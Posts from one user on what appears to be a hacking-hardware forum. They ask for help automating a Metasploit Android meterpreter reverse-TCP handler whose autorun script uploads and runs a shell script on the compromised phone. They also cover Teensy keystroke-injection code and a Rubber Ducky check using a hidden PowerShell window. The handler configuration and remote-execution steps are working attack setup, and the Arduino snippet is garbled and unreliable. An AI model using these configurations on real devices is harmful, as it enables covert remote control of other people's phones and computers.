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Posts posted by Skynet2018

  1. I try to make metasploit autorunscript for android. The firest .rc file has this config

    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST xxx.xxx.xxx.xxx (my IP)
    set LPORT 4545
    set AutoRunScript multi_console_command -r /root/Desktop/commands.rc
    exploit -j -z

    and this is the second .rc file (commands.rc)

    upload /root/Desktop/and.sh /data/data/com.metasploit.stage/files
    cd /data/data/com.metasploit.stage/files 
    sh and.sh

    The problem is after the shell command is executed the sh and.sh and the exit commands are not executed. If I type manually the sh and.sh and the exit commands it's working. The question is how can I make this commands to be executed ? Any Suggestions are Welcome and Appreciated!

  2. This is the code for arduino 

    bool secure_prompt(int reps, int millisecs)
    ... initialise SD card, DIP switches
    ... open a command prompt
    ... write a vbscipt that turns on numlock and execute it.
    // loop (repeat) times for (speed) milliseconds
    bool check_for_numlock_sucess_teensy(int reps, int millisecs)
    int i = 0;
    if (is_num_on())
    return true;
    } while (!is_num_on() && (i>reps));
    return false;

    I found a website that convert ducky code to arduino but I don't found how to convert from arduino to ducky.  It would be nice if we could convert somehow from arduino to ducky

  3. I see some ducky payloads that show as the command it was executed, by the caps lock led. For example If I want to run GUI D after I can put a cmd to show me that command was executed. So if I do that then it will be like this when I put in my ducky it execute the GUI D and after the caps lock blinks one time or 2 times. I wander, if we can do this with the duck why we can't do an if statement if the caps lock blink 2 times then go to the next command but if not blink then run the GUI D command again. I think there is a way to do this but I'm not sure how to do it.  An example: make a new text document and add this code

     start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

    save it to .bat and execute it. You well see caps lock will blink 2 times.  Now if you add this command after GUI R STRING cmd ENTER it will work. But if we can put some commands to repeat the first commands if the caps lock not blink. Than it will work I think. 

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